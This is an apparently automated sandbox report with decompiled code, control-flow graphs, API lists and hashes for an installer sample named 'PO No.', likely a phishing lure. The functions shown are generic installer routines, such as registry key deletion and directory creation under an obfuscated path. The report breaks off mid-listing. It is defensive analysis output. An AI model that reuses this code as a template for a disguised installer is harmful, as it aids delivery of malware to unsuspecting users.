                                                                      control_flow_graph 959 10001759-10001795 call 10001b18 963 100018a6-100018a8 959->963 964 1000179b-1000179f 959->964 965 100017a1-100017a7 call 10002286 964->965 966 100017a8-100017b5 call 100022d0 964->966 965->966 971 100017e5-100017ec 966->971 972 100017b7-100017bc 966->972 973 1000180c-10001810 971->973 974 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 971->974 975 100017d7-100017da 972->975 976 100017be-100017bf 972->976 977 10001812-1000184c call 100015b4 call 100024a4 973->977 978 1000184e-10001854 call 100024a4 973->978 1000 10001855-10001859 974->1000 975->971 979 100017dc-100017dd call 10002b57 975->979 981 100017c1-100017c2 976->981 982 100017c7-100017c8 call 1000289c 976->982 977->1000 978->1000 994 100017e2 979->994 983 100017c4-100017c5 981->983 984 100017cf-100017d5 call 10002640 981->984 991 100017cd 982->991 983->971 983->982 999 100017e4 984->999 991->994 994->999 999->971 1003 10001896-1000189d 1000->1003 1004 1000185b-10001869 call 10002467 1000->1004 1003->963 1006 1000189f-100018a0 GlobalFree 1003->1006 1009 10001881-10001888 1004->1009 1010 1000186b-1000186e 1004->1010 1006->963 1009->1003 1012 1000188a-10001895 call 1000153d 1009->1012 1010->1009 1011 10001870-10001878 1010->1011 1011->1009 1013 1000187a-1000187b FreeLibrary 1011->1013 1012->1003 1013->1009
                                                                      C-Code - Quality: 92%
                                                                      			E10001759(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				void _v36;
                                                                      				struct HINSTANCE__* _t34;
                                                                      				intOrPtr _t38;
                                                                      				void* _t44;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				void* _t50;
                                                                      				intOrPtr _t53;
                                                                      				signed int _t57;
                                                                      				signed int _t61;
                                                                      				void* _t65;
                                                                      				void* _t66;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      
                                                                      				_t74 = __esi;
                                                                      				_t66 = __edi;
                                                                      				_t65 = __edx;
                                                                      				 *0x1000406c = _a8;
                                                                      				 *0x10004070 = _a16;
                                                                      				 *0x10004074 = _a12;
                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                                      				_push(1); // executed
                                                                      				_t34 = E10001B18(); // executed
                                                                      				_t50 = _t34;
                                                                      				if(_t50 == 0) {
                                                                      					L28:
                                                                      					return _t34;
                                                                      				} else {
                                                                      					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                      						E10002286(_t50);
                                                                      					}
                                                                      					_push(_t50);
                                                                      					E100022D0(_t65);
                                                                      					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                      					if(_t53 == 0xffffffff) {
                                                                      						L14:
                                                                      						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                                      							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                      								_t34 = E100024A4(_t50);
                                                                      							} else {
                                                                      								_push(_t74);
                                                                      								_push(_t66);
                                                                      								_t12 = _t50 + 0x1018; // 0x1018
                                                                      								_t57 = 8;
                                                                      								memcpy( &_v36, _t12, _t57 << 2);
                                                                      								_t38 = E100015B4(_t50);
                                                                      								_t15 = _t50 + 0x1018; // 0x1018
                                                                      								_t70 = _t15;
                                                                      								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                                      								 *_t70 = 4;
                                                                      								E100024A4(_t50);
                                                                      								_t61 = 8;
                                                                      								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                      							}
                                                                      						} else {
                                                                      							E100024A4(_t50);
                                                                      							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                                      						}
                                                                      						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                      							_t34 = E10002467(_t50);
                                                                      							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                      								_t34 =  *(_t50 + 0x1008);
                                                                      								if(_t34 != 0) {
                                                                      									_t34 = FreeLibrary(_t34);
                                                                      								}
                                                                      							}
                                                                      							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                                      								_t34 = E1000153D( *0x10004068);
                                                                      							}
                                                                      						}
                                                                      						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                                      							goto L28;
                                                                      						} else {
                                                                      							return GlobalFree(_t50);
                                                                      						}
                                                                      					}
                                                                      					_t44 =  *_t50;
                                                                      					if(_t44 == 0) {
                                                                      						if(_t53 != 1) {
                                                                      							goto L14;
                                                                      						}
                                                                      						E10002B57(_t50);
                                                                      						L12:
                                                                      						_t50 = _t44;
                                                                      						L13:
                                                                      						goto L14;
                                                                      					}
                                                                      					_t45 = _t44 - 1;
                                                                      					if(_t45 == 0) {
                                                                      						L8:
                                                                      						_t44 = E1000289C(_t53, _t50); // executed
                                                                      						goto L12;
                                                                      					}
                                                                      					_t46 = _t45 - 1;
                                                                      					if(_t46 == 0) {
                                                                      						E10002640(_t50);
                                                                      						goto L13;
                                                                      					}
                                                                      					if(_t46 != 1) {
                                                                      						goto L14;
                                                                      					}
                                                                      					goto L8;
                                                                      				}
                                                                      			}

















                                                                      0x10001759
                                                                      0x10001759
                                                                      0x10001759
                                                                      0x10001763
                                                                      0x1000176b
                                                                      0x10001778
                                                                      0x10001786
                                                                      0x10001789
                                                                      0x1000178b
                                                                      0x10001790
                                                                      0x10001795
                                                                      0x100018a8
                                                                      0x100018a8
                                                                      0x1000179b
                                                                      0x1000179f
                                                                      0x100017a2
                                                                      0x100017a7
                                                                      0x100017a8
                                                                      0x100017a9
                                                                      0x100017af
                                                                      0x100017b5
                                                                      0x100017e5
                                                                      0x100017ec
                                                                      0x10001810
                                                                      0x1000184f
                                                                      0x10001812
                                                                      0x10001812
                                                                      0x10001813
                                                                      0x10001816
                                                                      0x1000181c
                                                                      0x10001820
                                                                      0x10001823
                                                                      0x10001828
                                                                      0x10001828
                                                                      0x1000182f
                                                                      0x10001835
                                                                      0x1000183b
                                                                      0x10001847
                                                                      0x10001848
                                                                      0x1000184b
                                                                      0x100017ee
                                                                      0x100017ef
                                                                      0x10001804
                                                                      0x10001804
                                                                      0x10001859
                                                                      0x1000185c
                                                                      0x10001869
                                                                      0x10001870
                                                                      0x10001878
                                                                      0x1000187b
                                                                      0x1000187b
                                                                      0x10001878
                                                                      0x10001888
                                                                      0x10001890
                                                                      0x10001895
                                                                      0x10001888
                                                                      0x1000189d
                                                                      0x00000000
                                                                      0x1000189f
                                                                      0x00000000
                                                                      0x100018a0
                                                                      0x1000189d
                                                                      0x100017b9
                                                                      0x100017bc
                                                                      0x100017da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100017dd
                                                                      0x100017e2
                                                                      0x100017e2
                                                                      0x100017e4
                                                                      0x00000000
                                                                      0x100017e4
                                                                      0x100017be
                                                                      0x100017bf
                                                                      0x100017c7
                                                                      0x100017c8
                                                                      0x00000000
                                                                      0x100017c8
                                                                      0x100017c1
                                                                      0x100017c2
                                                                      0x100017d0
                                                                      0x00000000
                                                                      0x100017d0
                                                                      0x100017c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100017c5

                                                                      APIs
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                      • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                      • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                      • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1016 4032c2-4032ea GetTickCount 1017 4032f0-40331b call 403441 SetFilePointer 1016->1017 1018 40341a-403422 call 402e72 1016->1018 1024 403320-403332 1017->1024 1023 403424-403428 1018->1023 1025 403334 1024->1025 1026 403336-403344 call 40342b 1024->1026 1025->1026 1029 40334a-403356 1026->1029 1030 40340c-40340f 1026->1030 1031 40335c-403362 1029->1031 1030->1023 1032 403364-40336a 1031->1032 1033 40338d-4033a9 call 40690b 1031->1033 1032->1033 1035 40336c-40338c call 402e72 1032->1035 1038 403415 1033->1038 1039 4033ab-4033b3 1033->1039 1035->1033 1041 403417-403418 1038->1041 1042 4033b5-4033bd call 405f54 1039->1042 1043 4033d6-4033dc 1039->1043 1041->1023 1046 4033c2-4033c4 1042->1046 1043->1038 1045 4033de-4033e0 1043->1045 1045->1038 1047 4033e2-4033f5 1045->1047 1048 403411-403413 1046->1048 1049 4033c6-4033d2 1046->1049 1047->1024 1050 4033fb-40340a SetFilePointer 1047->1050 1048->1041 1049->1031 1051 4033d4 1049->1051 1050->1018 1051->1047
                                                                      C-Code - Quality: 94%
                                                                      			E004032C2(intOrPtr _a4) {
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr _t11;
                                                                      				signed int _t12;
                                                                      				void* _t14;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      				void* _t18;
                                                                      				intOrPtr _t19;
                                                                      				intOrPtr _t31;
                                                                      				long _t32;
                                                                      				intOrPtr _t34;
                                                                      				intOrPtr _t36;
                                                                      				void* _t37;
                                                                      				intOrPtr _t49;
                                                                      
                                                                      				_t32 =  *0x418ed4; // 0x7680
                                                                      				_t34 = _t32 -  *0x40ce40 + _a4;
                                                                      				 *0x42a250 = GetTickCount() + 0x1f4;
                                                                      				if(_t34 <= 0) {
                                                                      					L22:
                                                                      					E00402E72(1);
                                                                      					return 0;
                                                                      				}
                                                                      				E00403441( *0x418ee4);
                                                                      				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
                                                                      				 *0x418ee0 = _t34;
                                                                      				 *0x418ed0 = 0;
                                                                      				while(1) {
                                                                      					_t10 =  *0x418ed8; // 0x5b2d1
                                                                      					_t31 = 0x4000;
                                                                      					_t11 = _t10 -  *0x418ee4;
                                                                      					if(_t11 <= 0x4000) {
                                                                      						_t31 = _t11;
                                                                      					}
                                                                      					_t12 = E0040342B(0x414ed0, _t31);
                                                                      					if(_t12 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					 *0x418ee4 =  *0x418ee4 + _t31;
                                                                      					 *0x40ce60 = 0x414ed0;
                                                                      					 *0x40ce64 = _t31;
                                                                      					L6:
                                                                      					L6:
                                                                      					if( *0x42a254 != 0 &&  *0x42a300 == 0) {
                                                                      						_t19 =  *0x418ee0; // 0x153ac
                                                                      						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
                                                                      						E00402E72(0);
                                                                      					}
                                                                      					 *0x40ce68 = 0x40ced0;
                                                                      					 *0x40ce6c = 0x8000; // executed
                                                                      					_t14 = E0040690B(0x40ce48); // executed
                                                                      					if(_t14 < 0) {
                                                                      						goto L20;
                                                                      					}
                                                                      					_t36 =  *0x40ce68; // 0x412828
                                                                      					_t37 = _t36 - 0x40ced0;
                                                                      					if(_t37 == 0) {
                                                                      						__eflags =  *0x40ce64; // 0x0
                                                                      						if(__eflags != 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						__eflags = _t31;
                                                                      						if(_t31 == 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						L16:
                                                                      						_t16 =  *0x418ed4; // 0x7680
                                                                      						if(_t16 -  *0x40ce40 + _a4 > 0) {
                                                                      							continue;
                                                                      						}
                                                                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                      						goto L22;
                                                                      					}
                                                                      					_t18 = E00405F54( *0x40a01c, 0x40ced0, _t37); // executed
                                                                      					if(_t18 == 0) {
                                                                      						_push(0xfffffffe);
                                                                      						L21:
                                                                      						_pop(_t15);
                                                                      						return _t15;
                                                                      					}
                                                                      					 *0x40ce40 =  *0x40ce40 + _t37;
                                                                      					_t49 =  *0x40ce64; // 0x0
                                                                      					if(_t49 != 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					goto L16;
                                                                      					L20:
                                                                      					_push(0xfffffffd);
                                                                      					goto L21;
                                                                      				}
                                                                      				return _t12 | 0xffffffff;
                                                                      			}

















                                                                      0x004032c5
                                                                      0x004032d2
                                                                      0x004032e5
                                                                      0x004032ea
                                                                      0x0040341a
                                                                      0x0040341c
                                                                      0x00000000
                                                                      0x00403422
                                                                      0x004032f6
                                                                      0x00403309
                                                                      0x0040330f
                                                                      0x00403315
                                                                      0x00403320
                                                                      0x00403320
                                                                      0x00403325
                                                                      0x0040332a
                                                                      0x00403332
                                                                      0x00403334
                                                                      0x00403334
                                                                      0x0040333d
                                                                      0x00403344
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040334a
                                                                      0x00403350
                                                                      0x00403356
                                                                      0x00000000
                                                                      0x0040335c
                                                                      0x00403362
                                                                      0x0040336c
                                                                      0x00403382
                                                                      0x00403387
                                                                      0x0040338c
                                                                      0x00403392
                                                                      0x00403398
                                                                      0x004033a2
                                                                      0x004033a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033ab
                                                                      0x004033b1
                                                                      0x004033b3
                                                                      0x004033d6
                                                                      0x004033dc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033de
                                                                      0x004033e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033e2
                                                                      0x004033e2
                                                                      0x004033f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403404
                                                                      0x00000000
                                                                      0x00403404
                                                                      0x004033bd
                                                                      0x004033c4
                                                                      0x00403411
                                                                      0x00403417
                                                                      0x00403417
                                                                      0x00000000
                                                                      0x00403417
                                                                      0x004033c6
                                                                      0x004033cc
                                                                      0x004033d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403415
                                                                      0x00403415
                                                                      0x00000000
                                                                      0x00403415
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004032D6
                                                                        • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                      • SetFilePointer.KERNELBASE(00007680,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer$CountTick
                                                                      • String ID: ((A
                                                                      • API String ID: 1092082344-2509836774
                                                                      • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                      • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                      • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                      • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                      				void* _v8;
                                                                      				short _v532;
                                                                      				void* _t19;
                                                                      				signed int _t26;
                                                                      				intOrPtr* _t28;
                                                                      				signed int _t33;
                                                                      				signed int _t34;
                                                                      				signed int _t35;
                                                                      
                                                                      				_t34 = _a12;
                                                                      				_t35 = _t34 & 0x00000300;
                                                                      				_t33 = _t34 & 0x00000001;
                                                                      				_t19 = E0040621D(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
                                                                      				if(_t19 == 0) {
                                                                      					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                      						__eflags = _t33;
                                                                      						if(__eflags != 0) {
                                                                      							RegCloseKey(_v8);
                                                                      							return 1;
                                                                      						}
                                                                      						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                                                      						__eflags = _t26;
                                                                      						if(_t26 != 0) {
                                                                      							break;
                                                                      						}
                                                                      					}
                                                                      					RegCloseKey(_v8);
                                                                      					_t28 = E0040678A(3);
                                                                      					if(_t28 == 0) {
                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                      					}
                                                                      					return  *_t28(_a4, _a8, _t35, 0);
                                                                      				}
                                                                      				return _t19;
                                                                      			}











                                                                      0x00402d35
                                                                      0x00402d3e
                                                                      0x00402d47
                                                                      0x00402d53
                                                                      0x00402d5a
                                                                      0x00402d7e
                                                                      0x00402d64
                                                                      0x00402d66
                                                                      0x00402db9
                                                                      0x00000000
                                                                      0x00402dc1
                                                                      0x00402d75
                                                                      0x00402d7a
                                                                      0x00402d7c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d7c
                                                                      0x00402d98
                                                                      0x00402da0
                                                                      0x00402da7
                                                                      0x00000000
                                                                      0x00402dca
                                                                      0x00000000
                                                                      0x00402db2
                                                                      0x00402dd4

                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                      • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                      • Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                      • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                      				void* _t17;
                                                                      				int _t23;
                                                                      				void* _t25;
                                                                      				signed char _t26;
                                                                      				short _t28;
                                                                      				short _t31;
                                                                      				short* _t34;
                                                                      				void* _t36;
                                                                      
                                                                      				_t28 = __ebx;
                                                                      				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                                                      				_t17 = E00405D2C(_t16);
                                                                      				_t32 = _t17;
                                                                      				if(_t17 != __ebx) {
                                                                      					do {
                                                                      						_t34 = E00405CAE(_t32, 0x5c);
                                                                      						_t31 =  *_t34;
                                                                      						 *_t34 = _t28;
                                                                      						if(_t31 != _t28) {
                                                                      							L5:
                                                                      							_t25 = E00405960( *(_t36 + 8));
                                                                      						} else {
                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                      							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040597D(_t42) == 0) {
                                                                      								goto L5;
                                                                      							} else {
                                                                      								_t25 = E004058E3( *(_t36 + 8)); // executed
                                                                      							}
                                                                      						}
                                                                      						if(_t25 != _t28) {
                                                                      							if(_t25 != 0xb7) {
                                                                      								L9:
                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                      							} else {
                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                      									goto L9;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						 *_t34 = _t31;
                                                                      						_t32 = _t34 + 2;
                                                                      					} while (_t31 != _t28);
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                      					_push(0xfffffff5);
                                                                      					E00401423();
                                                                      				} else {
                                                                      					E00401423(0xffffffe6);
                                                                      					E004063B0(L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose\\Circularizations126\\Iltningernes\\Mellivorous",  *(_t36 + 8));
                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                      					if(_t23 == 0) {
                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                      					}
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                      				return 0;
                                                                      			}











                                                                      0x004015c1
                                                                      0x004015c9
                                                                      0x004015cc
                                                                      0x004015d1
                                                                      0x004015d5
                                                                      0x004015d7
                                                                      0x004015df
                                                                      0x004015e1
                                                                      0x004015e4
                                                                      0x004015ea
                                                                      0x00401604
                                                                      0x00401607
                                                                      0x004015ec
                                                                      0x004015ec
                                                                      0x004015ef
                                                                      0x00000000
                                                                      0x004015fa
                                                                      0x004015fd
                                                                      0x004015fd
                                                                      0x004015ef
                                                                      0x0040160e
                                                                      0x00401615
                                                                      0x00401624
                                                                      0x00401624
                                                                      0x00401617
                                                                      0x0040161a
                                                                      0x00401622
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401622
                                                                      0x00401615
                                                                      0x00401627
                                                                      0x0040162b
                                                                      0x0040162c
                                                                      0x004015d7
                                                                      0x00401634
                                                                      0x00401663
                                                                      0x00402245
                                                                      0x00401636
                                                                      0x00401638
                                                                      0x00401645
                                                                      0x0040164d
                                                                      0x00401655
                                                                      0x0040165b
                                                                      0x0040165b
                                                                      0x00401655
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75702EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405D3A
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                        • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous,?,00000000,000000F0), ref: 0040164D
                                                                      Strings
                                                                      • C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous, xrefs: 00401640
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous
                                                                      • API String ID: 1892508949-1754102795
                                                                      • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                      • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                      • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                      • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E00405388(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                      				long _t9;
                                                                      				int _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t15 = _a8;
                                                                      				if(_t15 != 0x102) {
                                                                      					if(_t15 != 0x200) {
                                                                      						_t16 = _a16;
                                                                      						L7:
                                                                      						if(_t15 == 0x419 &&  *0x423714 != _t16) {
                                                                      							_push(_t16);
                                                                      							_push(6);
                                                                      							 *0x423714 = _t16;
                                                                      							E00404D5E();
                                                                      						}
                                                                      						L11:
                                                                      						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
                                                                      						return _t9;
                                                                      					}
                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                      						L10:
                                                                      						_t16 = _a16;
                                                                      						goto L11;
                                                                      					}
                                                                      					_t16 = E00404CDE(_a4, 1);
                                                                      					_t15 = 0x419;
                                                                      					goto L7;
                                                                      				}
                                                                      				if(_a12 != 0x20) {
                                                                      					goto L10;
                                                                      				}
                                                                      				E00404391(0x413);
                                                                      				return 0;
                                                                      			}






                                                                      0x0040538c
                                                                      0x00405396
                                                                      0x004053b2
                                                                      0x004053d4
                                                                      0x004053d7
                                                                      0x004053dd
